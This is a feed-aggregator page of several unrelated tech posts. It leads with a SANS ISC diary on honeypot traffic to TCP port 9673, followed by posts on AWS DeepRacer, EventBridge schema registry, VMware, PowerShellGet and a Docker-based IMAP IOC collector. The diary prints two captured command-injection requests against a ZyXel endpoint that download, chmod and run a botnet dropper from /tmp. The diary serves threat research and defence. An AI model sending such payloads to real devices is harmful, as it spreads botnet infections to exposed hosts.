Attack traffic on TCP port 9673, (Fri, May 1st)

This post was originally published on this site

I don’t know how many of you pay attention to the Top 10 Ports graphs on your dashboard, but I do. Unfortunately, the top 10 is pretty constant; the botnets keep attacking the same ports. What I find more interesting is anomalous behavior: changes from what is normal on a given port. So, a little over a week ago, I saw a jump on a port I wasn’t familiar with.

In fact, when I look at the longer term, we’ve seen the occasional spike, but this is the first one where the number of sources was up significantly, too.

So, what are the attackers looking for in this last week? Well, as I have in previous diaries, I turned to fellow handler Didier Stevens’ tcp-honeypot. Since there seem to be web admin consoles on lots of ports, I set up TCP port 9673 to look like a web server, though it probably wasn’t necessary. I brought this up on a VPS I have and within minutes started getting hits (I have included two examples below). With a little DuckDuckGo-ing, I came across an advisory for a ZyXel 0-day from last month. I guess someone finally decided to go after it. I was unable to download the second stage (it looks like the servers hosting the payloads may have been shut down already), but according to Radware, this is the Hoaxcalls DDoS botnet in action.
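For readers who want to replicate the setup without the full tool, the idea can be sketched in a few lines of Python. This is a minimal stand-in, not Didier's tcp-honeypot itself: log whatever the client sends and reply with a bare HTTP 200 so scanners believe a web server is present.

```python
import socket
import threading

# A canned response so the listener looks like a web server.
BANNER = b"HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Length: 0\r\n\r\n"

def serve_once(sock, log):
    """Accept one connection, record the raw request, send the banner."""
    conn, addr = sock.accept()
    data = conn.recv(4096)
    log.append((addr[0], data))   # record source IP and raw request bytes
    conn.sendall(BANNER)          # pretend to be a web server
    conn.close()

def start(port=9673):
    """Bind a listening socket on the given port (0 = ephemeral)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(("0.0.0.0", port))
    sock.listen(5)
    return sock
```

A real deployment would loop over `serve_once` and write the log to disk; the sketch keeps a single accept so the flow is easy to follow.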

20200429-051959: data b"GET /live/CPEManager/AXCampaignManager/delete_cpes_by_ids HTTP/1.1\r\nUser-Agent: XTC\r\nHost: 1000\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\n\r\ncpe_ids=__import__('os').system('wget -O /tmp/viktor; chmod 777 /tmp/viktor; /tmp/viktor')\r\n\r\n"

20200430-082737: data b"GET /live/CPEManager/AXCampaignManager/delete_cpes_by_ids HTTP/1.1\r\nUser-Agent: XTC\r\nHost: 1000\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\n\r\ncpe_ids=__import__('os').system('wget -O /tmp/upnp.debug; chmod 777 /tmp/upnp.debug; /tmp/upnp.debug')\r\n\r\n"
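The interesting part of each hit is the cpe_ids parameter, which smuggles a Python expression into the vulnerable CPE management endpoint; the shell command handed to os.system() sits between the quotes. A quick way to pull the injected command out of a captured request (a sketch built around the payloads above):

```python
import re

# The hits embed __import__('os').system('<command>') in cpe_ids;
# capture whatever sits between the single quotes of the system() call.
INJECT_RE = re.compile(r"__import__\('os'\)\.system\('([^']+)'\)")

def injected_command(raw_request):
    """Return the shell command smuggled in via cpe_ids, or None."""
    m = INJECT_RE.search(raw_request)
    return m.group(1) if m else None

# One of the honeypot hits, reconstructed as a plain string.
hit = ("GET /live/CPEManager/AXCampaignManager/delete_cpes_by_ids HTTP/1.1\r\n"
       "User-Agent: XTC\r\nHost: 1000\r\n\r\n"
       "cpe_ids=__import__('os').system('wget -O /tmp/viktor; "
       "chmod 777 /tmp/viktor; /tmp/viktor')\r\n\r\n")
```

Feeding honeypot logs through something like this makes it easy to diff the dropper commands across sources.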

As we always say, your IoT devices should not generally be directly exposed to the internet. I know people are fond of saying the perimeter is dead, but seriously, you should still have a firewall that blocks inbound traffic to (at least) your IoT devices.

Jim Clausing, GIAC GSE #26
jclausing –at– isc [dot] sans (dot) edu

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Join the FORMULA 1 DeepRacer ProAm Special Event


The AWS DeepRacer League gives you the opportunity to race for prizes and glory, while also having fun & learning about reinforcement learning. You can use the AWS DeepRacer 3D racing simulator to build, train, and evaluate your models. You can review the results and improve your models in order to ensure that they are race-ready.

Winning a FORMULA 1 (F1) race requires a technologically sophisticated car, a top-notch driver, an outstanding crew, and (believe it or not) a healthy dose of machine learning. For the past couple of seasons AWS has been working with the Formula 1 team to find ways to use machine learning to make cars that are faster and more fuel-efficient than ever before (read The Fastest Cars Deserve the Fastest Cloud and Formula 1 Works with AWS to Develop Next Generation Race Car to learn more).

Special Event
Each month the AWS DeepRacer League runs a new Virtual Race in the AWS DeepRacer console and this month is a special one: the Formula 1 DeepRacer ProAm Special Event. During the month of May you can compete for the opportunity to race against models built and tuned by Formula 1 drivers and their crews. Here’s the lineup:

Rob Smedley – Director of Data Systems for F1 and AWS Technical Ambassador.

Daniel Ricciardo – F1 driver for Renault, with 7 Grand Prix wins and 29 podium appearances.

Tatiana Calderon – Test driver for the Alfa Romeo F1 team and 2019 F2 driver.

Each pro will be partnered with a member of the AWS Pit Crew tasked with teaching them new skills and taking them on a learning journey. Here’s the week-by-week plan for the pros:

Week 1 – Learn the basics of reinforcement learning and submit models using a standard, single-camera vehicle configuration.

Week 2 – Add stereo cameras to vehicles and learn how to configure reward functions to dodge debris on the track.

Week 3 – Add LIDAR to vehicles and use the rest of the month to prepare for the head-to-head qualifier.

At the end of the month the top AWS DeepRacer amateurs will face off against the professionals, in an exciting head-to-head elimination race, scheduled for the week of June 1.

The teams will be documenting their learning journey and you’ll be able to follow along as they apply real-life racing strategies and data science to the world of autonomous racing.

Bottom line: You have the opportunity to build & train a model, and then race it against one from Rob, Daniel, or Tatiana. How cool is that?

Start Your Engines
And now it is your turn. Read Get Started with AWS DeepRacer, build your model, join the Formula 1 DeepRacer ProAm Special Event, train it on the Circuit de Barcelona-Catalunya track, and don’t give up until you are at the top of the chart.

Training and evaluation using the DeepRacer Console are available at no charge for the duration of the event (Terms and Conditions apply), making this a great opportunity for you to have fun while learning a useful new skill.

Good luck, and see you at the finish line!



New – Amazon EventBridge Schema Registry is Now Generally Available


Amazon EventBridge is a serverless event bus that makes it easy to connect applications together. It can use data from AWS services, your own applications, and integrations with Software-as-a-Service (SaaS) partners. Last year at re:Invent, we introduced, in preview, EventBridge schema registry and discovery, a way to store the structure of events (the schema) in a central location and simplify using events in your code by generating the code to process them for Java, Python, and TypeScript.

Today, I am happy to announce that the EventBridge schema registry is generally available, and that we have added support for resource policies. Resource policies allow you to share a schema registry across different AWS accounts and organizations. In this way, developers on different teams can search for and use any schema that another team has added to the shared registry.

Using EventBridge Schema Registry Resource Policies
It’s common for companies to have different development teams working on different services. To make a more concrete example, let’s take two teams working on services that have to communicate with each other:

  • The CreateAccount development team, working on a frontend API that receives requests from a web/mobile client to create a new customer account for the company.
  • The FraudCheck development team, working on a backend service that checks the data for newly created accounts to estimate the risk that they are fake.

Each team is using their own AWS account to develop their application. Using EventBridge, we can implement the following architecture:

  • The frontend CreateAccount application uses Amazon API Gateway to process requests with an AWS Lambda function written in Python. When a new account is created, the Lambda function publishes the ACCOUNT_CREATED event on a custom event bus.
  • The backend FraudCheck Lambda function is built in Java, and is expecting to receive the ACCOUNT_CREATED event to call Amazon Fraud Detector (a fully managed service we introduced in preview at re:Invent) to estimate the risk of that being a fake account. If the risk is above a certain threshold, the Lambda function takes preemptive actions. For example, it can flag the account as fake on a database, or post a FAKE_ACCOUNT event on the event bus.

How can the two teams coordinate their work so that they both know the syntax of the events, and use EventBridge to generate the code to process those events?

First, a custom event bus is created with permissions to access within the company organization.

Then, the CreateAccount team uses EventBridge schema discovery to automatically populate the schema for the ACCOUNT_CREATED event that their service is publishing. This event contains all the information of the account that has just been created.

In an event-driven architecture, services can subscribe to specific types of events that they’re interested in. To receive ACCOUNT_CREATED events, a rule is created on the event bus to send those events to the FraudCheck function.

Using resource policies, the CreateAccount team gives read-only access to the FraudCheck team AWS account to the discovered schemas. The Principal in this policy is the AWS account getting the permissions. The Resource is the schema registry that is being shared.

  "Version": "2012-10-17",
  "Statement": [
      "Sid": "GiveSchemaAccess",
      "Effect": "Allow",
      "Action": [
      "Principal": {
        "AWS": "123412341234"
      "Resource": [

Now, the FraudCheck team can search the content of the discovered schema for the ACCOUNT_CREATED event. Resource policies allow you to make a registry available across accounts and organizations, but they will not automatically show up in the console. To access the shared registry, the FraudCheck team needs to use the AWS Command Line Interface (CLI) and specify the full ARN of the registry:

aws schemas search-schemas \
    --registry-name arn:aws:schemas:us-east-1:432143214321:registry/discovered-schemas \
    --keywords ACCOUNT_CREATED

In this way, the FraudCheck team gets the exact name of the schema created by the CreateAccount team.

    "Schemas": [
            "RegistryName": "discovered-schemas",
            "SchemaArn": "arn:aws:schemas:us-east-1:432143214321:schema/discovered-schemas/CreateAccount@ACCOUNT_CREATED",
            "SchemaName": “CreateAccount@ACCOUNT_CREATED",
            "SchemaVersions": [
                    "CreatedDate": "2020-04-28T11:10:15+00:00",
                    "SchemaVersion": 1

With the schema name, the FraudCheck team can describe the content of the schema:

aws schemas describe-schema \
    --registry-name arn:aws:schemas:us-east-1:432143214321:registry/discovered-schemas \
    --schema-name CreateAccount@ACCOUNT_CREATED

The result describes the schema using the OpenAPI specification:

    "Content": "{"openapi":"3.0.0","info":{"version":"1.0.0","title":"CREATE_ACCOUNT"},"paths":{},"components":{"schemas":{"AWSEvent":{"type":"object","required":["detail-type","resources","detail","id","source","time","region","version","account"],"x-amazon-events-detail-type":"CREATE_ACCOUNT","x-amazon-events-source":”CreateAccount","properties":{"detail":{"$ref":"#/components/schemas/CREATE_ACCOUNT"},"account":{"type":"string"},"detail-type":{"type":"string"},"id":{"type":"string"},"region":{"type":"string"},"resources":{"type":"array","items":{"type":"object"}},"source":{"type":"string"},"time":{"type":"string","format":"date-time"},"version":{"type":"string"}}},"CREATE_ACCOUNT":{"type":"object","required":["firstName","surname","id","email"],"properties":{"email":{"type":"string"},"firstName":{"type":"string"},"id":{"type":"string"},"surname":{"type":"string"}}}}}}",
    "LastModified": "2020-04-28T11:10:15+00:00",
    "SchemaArn": "arn:aws:schemas:us-east-1:432143214321:schema/discovered-schemas/CreateAccount@CREATE_ACCOUNT",
    "SchemaName": “CreateAccount@ACCOUNT_CREATED",
    "SchemaVersion": "1",
    "Tags": {},
    "Type": "OpenApi3",
    "VersionCreatedDate": "2020-04-28T11:10:15+00:00"

Using the AWS Command Line Interface (CLI), the FraudCheck team can create a code binding if it isn’t already created, using the put-code-binding command, and then download the code binding to process that event:

aws schemas get-code-binding-source \
    --registry-name arn:aws:schemas:us-east-1:432143214321:registry/discovered-schemas \
    --schema-name CreateAccount@ACCOUNT_CREATED \
    --language Java8

Another option for the FraudCheck team is to copy and paste (after unescaping the JSON string) the Content of the discovered schema to create a new custom schema in their AWS account.
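Unescaping the Content string is itself a two-liner: the describe-schema output is JSON, and Content is a JSON document serialized as a string inside it, so two passes of json.loads recover the OpenAPI definition. A sketch using a trimmed stand-in for the CLI output:

```python
import json

# Trimmed stand-in for the `aws schemas describe-schema` response:
# Content is a JSON document stored as an escaped string.
cli_output = json.dumps({
    "Content": json.dumps({
        "openapi": "3.0.0",
        "info": {"version": "1.0.0", "title": "CREATE_ACCOUNT"},
    }),
    "SchemaName": "CreateAccount@ACCOUNT_CREATED",
})

outer = json.loads(cli_output)          # first pass: the CLI response
schema = json.loads(outer["Content"])   # second pass: the OpenAPI doc
```

The resulting `schema` dict can then be re-serialized and pasted into the console as a new custom schema.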

Once the schema is copied to their own account, the FraudCheck team can use the AWS Toolkit IDE plugins to view the schema, download code bindings, and generate serverless applications directly from their IDEs. The EventBridge team is working to add the capability to the AWS Toolkit to use a schema registry in a different account, making this step simpler. Stay tuned!

Often customers have a specific team, with a different AWS account, managing the event bus. For the sake of simplicity, in this post I assumed that the CreateAccount team was the one configuring the EventBridge event bus. With more accounts, you can simplify permissions using IAM to share resources with groups of AWS accounts in AWS Organizations.

Available Now
The EventBridge Schema Registry is available now in all commercial regions except Bahrain, Cape Town, Milan, Osaka, Beijing, and Ningxia. For more information on how to use resource policies for schema registries, please see the documentation.

Using Schema Registry resource policies, it is much easier to coordinate the work of different teams sharing information in an event-driven architecture.

Let me know what you are going to build with this!


VMware vCenter 6.7 Update 3g and ESXi 6.7 patch Released


VMware has released vCenter 6.7 Update 3g, along with a new patch, ESXi 6.7 Update 3 P02. What’s new in vCenter 6.7 Update 3g: new alarms in vCenter Server. vCenter Server 6.7 Update 3g adds a Replication State Change alarm to the vCenter Server Appliance with an Embedded Platform Services Controller that displays when a replication state changes to […]

Integrate VMware Cloud on Dell EMC with Your Enterprise Infrastructure via AD Authentication and Hybrid Linked Mode


Get the most out of VMware Cloud on Dell EMC – enable unique administrator logins and simplify workload migration and deployment with Hybrid Linked Mode (HLM)

The post Integrate VMware Cloud on Dell EMC with Your Enterprise Infrastructure via AD Authentication and Hybrid Linked Mode appeared first on VMware vSphere Blog.

PowerShellGet 3.0 Preview 2


PowerShellGet 3.0 preview 2 is now available on the PowerShell Gallery.
The focus of this release is Install-PSResource parameters, error messages, and warnings.
For a full list of the issues addressed by this release please refer to this GitHub project.

Note: For background information on PowerShellGet 3.0 please refer to the blog post for the first preview release.

How to install the module

To install this version of PowerShellGet open any PowerShell console and run:
Install-Module -Name PowerShellGet -AllowPrerelease -Force -AllowClobber

New Features of this release

  • Progress bar and -Quiet parameter for Install-PSResource
  • TrustRepository parameter for Install-PSResource
  • NoClobber parameter for Install-PSResource
  • AcceptLicense parameter for Install-PSResource
  • Force parameter for Install-PSResource
  • Reinstall parameter for Install-PSResource
  • Improved error handling

What is next

GitHub is the best place to track the bugs/feature requests related to this module. We have used a combination of projects and labels on our GitHub repo to track issues for this upcoming release. We are using the label Resolved-3.0 to mark issues that we plan to release at some point before we release the module as GA (generally available). To track issues/features to particular preview and GA releases we are using GitHub projects which are titled to reflect the release.

The major feature for our next preview release (preview 3) is allowing Install-PSResource to accept a path to a psd1 or json file (using -RequiredResourceFile), or a hashtable or json string as input (using -RequiredResource).

How to Give feedback and Get Support

We cannot overstate how critical user feedback is at this stage in the development of the module. Feedback from preview releases helps inform design decisions without incurring breaking changes once the module is generally available and used in production. To help us make key decisions around the behavior of the module, please give us feedback by opening issues in our GitHub repository.

Sydney Smith
PowerShell Team

The post PowerShellGet 3.0 Preview 2 appeared first on PowerShell.

Collecting IOCs from IMAP Folder, (Thu, Apr 30th)


I have plenty of subscriptions to “cyber security” mailing lists that generate a lot of traffic. Even if we try to get rid of email, the fact remains: email is still a key communication channel. Some mailing list posts contain interesting indicators of compromise (IOCs). So, I searched for a nice way to extract them in an automated way (and to correlate them with other data). I did not find a ready-to-use solution that matched my requirements:

  • Connect to any mailbox (preferably via IMAP)
  • Produce data easy to process (JSON)
  • Be easy to deploy (Docker)

So, I built my own Docker image… It is based on the following components:

  • procmail
  • getmail
  • some Python libraries
  • The project es_mail_intel[1]

The last tool is an old project that does exactly what I expect: it extracts IOCs from emails and stores them in Elasticsearch. But if you don’t want Elasticsearch, it can also produce a JSON file! Parsing emails is a pain, so I did not want to write my own parser.

Data is processed in this way: emails are fetched via IMAP at regular intervals by getmail and handed to procmail, which pipes them to the Python script that extracts the interesting data.

IMAP data >> getmail >> procmail >> es_email_intel script >> JSON data
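Conceptually, the extraction step boils down to running IOC regexes over each message body. This is a sketch of the idea only, not es_mail_intel's actual code, and the patterns are deliberately simple (the real tool handles many more types and defanged notation):

```python
import re

# Illustrative patterns for a few common IOC types (assumption: the
# real parser is far more thorough than these regexes).
IOC_PATTERNS = {
    "ipv4":   re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "sha256": re.compile(r"\b[a-fA-F0-9]{64}\b"),
    "url":    re.compile(r"https?://[^\s\"'>]+"),
}

def extract_iocs(text):
    """Return a dict of IOC type -> sorted unique matches in the text."""
    return {name: sorted(set(rx.findall(text)))
            for name, rx in IOC_PATTERNS.items()}
```

Running this over a mailing list post yields a structure very close to the per-type arrays in the ioc.json output shown further down.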

Here is my Dockerfile:

FROM ubuntu:18.04
MAINTAINER Xavier Mertens <>
RUN apt-get update && \
    DEBIAN_FRONTEND=noninteractive apt-get install --no-install-recommends -y && \
    apt-get clean && \
    rm -rf /var/lib/apt/lists/*
RUN mkdir -p /root/.getmail
RUN git clone /opt/es_email_intel
COPY getmail.conf /
RUN echo ":0" >>/procmailrc
RUN echo "|/opt/es_email_intel/ 2 >>/log/ioc.json" >>/procmailrc
RUN chmod u+x /
RUN touch /tmp/firstboot
CMD ["/"]

It needs a getmail.conf with the parameters of the mailbox you’d like to monitor:

[retriever]
type = SimpleIMAPSSLRetriever
server = CONF_SERVER
username = CONF_LOGIN
password = CONF_PASSWORD

[destination]
type = MDA_external
path = /usr/bin/procmail
user = getmail
group = getmail
arguments = ('/procmailrc', )


getmail is a very powerful tool with plenty of options. Just have a look at the documentation[2] to find the best way to interact with your mailboxes. The container’s startup script configures your credentials at first boot:

if [ -r /tmp/firstboot ]; then
        sed -i "s|CONF_SERVER|$IMAP_SERVER|g" /getmail.conf
        sed -i "s|CONF_LOGIN|$IMAP_USER|g" /getmail.conf
        sed -i "s|CONF_PASSWORD|$IMAP_PASS|g" /getmail.conf

        groupadd getmail
        useradd -u $UID -g getmail -d /home/getmail getmail
        mkdir /home/getmail && chown getmail:getmail /home/getmail
        test -d /log || mkdir /log
        touch /log/getmail.log /log/ioc.json
        chown -R root:getmail /log
        chmod -R g+w /log
        rm /tmp/firstboot
fi

while true
do
        /usr/bin/getmail -r /getmail.conf
        sleep $IMAP_WAIT
done
And, finally, my docker-compose.yml file:

version: '3'
services:
    iocollector:
        build: .
        image: "xme/iocollector"
        restart: always
        hostname: iocollector
        container_name: iocollector
        volumes:
            - /etc/localtime:/etc/localtime:ro
            - /data/iocollector/log:/log
        environment:
            - UID=1000
            - IMAP_SERVER=<server_ip_or_fqdn>
            - IMAP_USER=<username>
            - IMAP_PASS=<password>
            - IMAP_WAIT=30
        network_mode: bridge

Start your docker and it will populate the mapped /log directory with an ‘ioc.json’ file:

    "bitcoin_wallet": [
    "ctime": "Thu Mar  5 17:54:23 2020",
    "domain": [
    "email": [
    "epoch": "1583427263",
    "filename": [
    "ipv4": [
    "md5": [],
    "message_text": "...",
    "mutex": [],
    "sha1": [],
    "sha256": [
    "ssdeep": [],
    "url": [

Note: The complete email is parsed. You will find in the JSON file all SMTP headers, the email body, etc. Less relevant for IOCs, but still interesting in some cases (for example, to analyze spam).
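Once ioc.json starts filling up, post-processing it is straightforward. A sketch that tallies how often each domain shows up, assuming one JSON object per processed email (field names as in the sample output above):

```python
import json
from collections import Counter

def top_domains(lines):
    """Count domain IOCs across all processed emails.

    `lines` is any iterable of JSON strings, e.g. an open ioc.json file.
    """
    counts = Counter()
    for line in lines:
        try:
            doc = json.loads(line)
        except json.JSONDecodeError:
            continue                      # skip partial or garbage lines
        counts.update(doc.get("domain", []))
    return counts
```

Typical use would be `top_domains(open("/data/iocollector/log/ioc.json"))`, then `counts.most_common(10)` to see which domains keep recurring across mailing lists.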

Here is a recap of the data flow:


Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant


PowerCLI – Backup and Restore ESXi Configuration (works with vSphere 7)


As you may recall from previous posts and general best practice in VMware environments, it is a good idea to perform a regular backup of both your vCenter and your ESXi host configuration.  Having these backups in place can certainly reduce the downtime in the event of an issue, and help to ease the recovery. Other blog posts have taken […]